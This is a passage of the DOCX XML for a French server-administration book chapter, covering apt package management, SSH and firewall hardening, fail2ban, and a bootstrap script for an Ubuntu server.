      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>52.2 Maîtriser les paquets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apt upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apt dist-upgrade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne se comportent pas de la même façon : le second peut installer et supprimer des paquets pour satisfaire les dépendances. Sur un serveur, la différence compte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Huit commandes `apt` et `dpkg`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Mises à jour</w:t>
        <w:br/>
        <w:t>apt update                       # rafraîchit les index</w:t>
        <w:br/>
        <w:t>apt upgrade -y                   # met à jour sans supprimer</w:t>
        <w:br/>
        <w:t>apt full-upgrade -y              # autorise les changements de dépendances</w:t>
        <w:br/>
        <w:t>apt install --only-upgrade nginx # un seul paquet</w:t>
        <w:br/>
        <w:br/>
        <w:t># Informations</w:t>
        <w:br/>
        <w:t>apt list --installed | head</w:t>
        <w:br/>
        <w:t>apt-cache policy nginx</w:t>
        <w:br/>
        <w:t>apt-cache show nginx | head -20</w:t>
        <w:br/>
        <w:t>dpkg -l | grep nginx</w:t>
        <w:br/>
        <w:t>dpkg -L nginx                    # fichiers installés</w:t>
        <w:br/>
        <w:t>dpkg -S /etc/nginx/nginx.conf    # paquet propriétaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois façons de maîtriser les versions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Épingler une version</w:t>
        <w:br/>
        <w:t>apt install nginx=1.24.0-1ubuntu1</w:t>
        <w:br/>
        <w:br/>
        <w:t># Empêcher une mise à jour</w:t>
        <w:br/>
        <w:t>apt-mark hold nginx</w:t>
        <w:br/>
        <w:t>apt-mark showhold</w:t>
        <w:br/>
        <w:t>apt-mark unhold nginx</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mises à jour de sécurité automatiques (Debian/Ubuntu)</w:t>
        <w:br/>
        <w:t>dpkg-reconfigure -plow unattended-upgrades</w:t>
        <w:br/>
        <w:t># /etc/apt/apt.conf.d/20auto-upgrades</w:t>
        <w:br/>
        <w:t># APT::Periodic::Unattended-Upgrade "1";</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NE MÉLANGEZ PAS LES SOURCES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Installer un paquet depuis un dépôt tiers pour une version plus récente peut bloquer les mises à jour du système entier. Préférez un paquet officiel, une image de conteneur ou une compilation isolée dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/opt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.180 — Cinq besoins et leurs réponses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19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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Solution système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version précise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3344"/>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Épinglage </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt-mark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Logiciel absent des dépôts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Dépôt officiel signé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Binaire dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/opt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utilisateur dédié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Mise à jour fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Dépôt amont</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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Image reconstruite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rollback rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Instantané de machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déploiement bleu-vert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>52.3 Durcir l'accès</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un serveur exposé à Internet reçoit des tentatives de connexion dès les premières minutes. Trois mesures suffisent à écarter l'immense majorité des attaques automatisées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Sept directives SSH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/etc/ssh/sshd_config</w:t>
        <w:br/>
        <w:t>PermitRootLogin no</w:t>
        <w:br/>
        <w:t>PasswordAuthentication no</w:t>
        <w:br/>
        <w:t>PubkeyAuthentication yes</w:t>
        <w:br/>
        <w:t>AllowUsers deploy admin</w:t>
        <w:br/>
        <w:t>MaxAuthTries 3</w:t>
        <w:br/>
        <w:t>ClientAliveInterval 300</w:t>
        <w:br/>
        <w:t>X11Forwarding no</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications indispensables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Vérifier avant de recharger : une erreur peut vous verrouiller dehors</w:t>
        <w:br/>
        <w:t>sshd -t</w:t>
        <w:br/>
        <w:t>systemctl reload ssh</w:t>
        <w:br/>
        <w:br/>
        <w:t># Tester dans une seconde session avant de fermer la première</w:t>
        <w:br/>
        <w:t>ssh -o PreferredAuthentications=publickey deploy@serveur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un pare-feu minimal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Pare-feu : n'ouvrir que le nécessaire</w:t>
        <w:br/>
        <w:t>ufw default deny incoming</w:t>
        <w:br/>
        <w:t>ufw default allow outgoing</w:t>
        <w:br/>
        <w:t>ufw allow 22/tcp</w:t>
        <w:br/>
        <w:t>ufw allow 80,443/tcp</w:t>
        <w:br/>
        <w:t>ufw enable</w:t>
        <w:br/>
        <w:t>ufw status verbose</w:t>
        <w:br/>
        <w:br/>
        <w:t># Équivalent nftables</w:t>
        <w:br/>
        <w:t>nft add table inet filtre</w:t>
        <w:br/>
        <w:t>nft add chain inet filtre entree '{ type filter hook input priority 0; policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">  drop; }'</w:t>
        <w:br/>
        <w:t>nft add rule inet filtre entree ct state established,related accept</w:t>
        <w:br/>
        <w:t>nft add rule inet filtre entree tcp dport { 22, 80, 443 } accept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre lignes et un service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Protection contre la force brute</w:t>
        <w:br/>
        <w:t>apt install -y fail2ban</w:t>
        <w:br/>
        <w:t># /etc/fail2ban/jail.local</w:t>
        <w:br/>
        <w:t>[sshd]</w:t>
        <w:br/>
        <w:t>enabled = true</w:t>
        <w:br/>
        <w:t>maxretry = 4</w:t>
        <w:br/>
        <w:t>findtime = 10m</w:t>
        <w:br/>
        <w:t>bantime = 1h</w:t>
        <w:br/>
        <w:br/>
        <w:t>systemctl enable --now fail2ban</w:t>
        <w:br/>
        <w:t>fail2ban-client status sshd</w:t>
      </w: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COMPTE D'ADMINISTRATION PLUTÔT QUE ROOT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un compte nominatif avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> permet de tracer qui a fait quoi. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PasswordAuthentication no</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> suppriment les deux vecteurs les plus exploités.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>52.4 Amorçage reproductible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une machine configurée à la main n'est pas reproductible. Le script d'amorçage documente l'état attendu, et permet de recréer un serveur identique en quelques minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un script d'amorçage complet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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t># amorcage.sh — état initial d'un serveur Ubuntu 24.04</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:br/>
        <w:t>export DEBIAN_FRONTEND=noninteractive</w:t>
        <w:br/>
        <w:br/>
        <w:t>apt update</w:t>
        <w:br/>
        <w:t>apt upgrade -y</w:t>
        <w:br/>
        <w:t>apt install -y curl ca-certificates chrony ufw fail2ban unattended-upgrades</w:t>
        <w:br/>
        <w:br/>
        <w:t># Fuseau et synchronisation</w:t>
        <w:br/>
        <w:t>timedatectl set-timezone Africa/Porto-Novo</w:t>
        <w:br/>
        <w:t>systemctl enable --now chrony</w:t>
        <w:br/>
        <w:br/>
        <w:t># Utilisateur d'administration</w:t>
        <w:br/>
        <w:t>id -u deploy &amp;&gt;/dev/null || adduser --disabled-password --gecos "" deploy</w:t>
        <w:br/>
        <w:t>usermod -aG sudo deploy</w:t>
        <w:br/>
        <w:t>install -d -m 700 -o deploy -g deploy /home/deploy/.ssh</w:t>
        <w:br/>
        <w:t>cat &gt; /home/deploy/.ssh/authorized_keys &lt;&lt;'KEY'</w:t>
        <w:br/>
        <w:t>ssh-ed25519 AAAAC3Nza... deploy@poste</w:t>
        <w:br/>
        <w:t>KEY</w:t>
        <w:br/>
        <w:t>chown deploy:deploy /home/deploy/.ssh/authorized_keys</w:t>
        <w:br/>
        <w:t>chmod 600 /home/deploy/.ssh/authorized_keys</w:t>
        <w:br/>
        <w:br/>
        <w:t># Durcissement</w:t>
        <w:br/>
        <w:t>sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config</w:t>
        <w:br/>
        <w:t>sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/'</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /etc/ssh/sshd_config</w:t>
        <w:br/>
        <w:t>sshd -t</w:t>
        <w:br/>
        <w:br/>
        <w:t>ufw --force enable</w:t>
        <w:br/>
        <w:t>ufw allow 22/tcp</w:t>
        <w:br/>
        <w:t>ufw allow 80,443/tcp</w:t>
        <w:br/>
        <w:br/>
        <w:t>systemctl reload ssh</w:t>
        <w:br/>
        <w:t>echo "Amorçage terminé"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.181 — Ce qui doit être versionné</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19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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Versionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Vérifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Script d'amorçage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Oui, dans le dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2617"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exécution sur machine neuve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Configuration SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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2617"/>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sshd -t</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Règles de pare-feu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>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2617"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ufw status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Paquets et versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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261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Comparaison avec l'inventaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
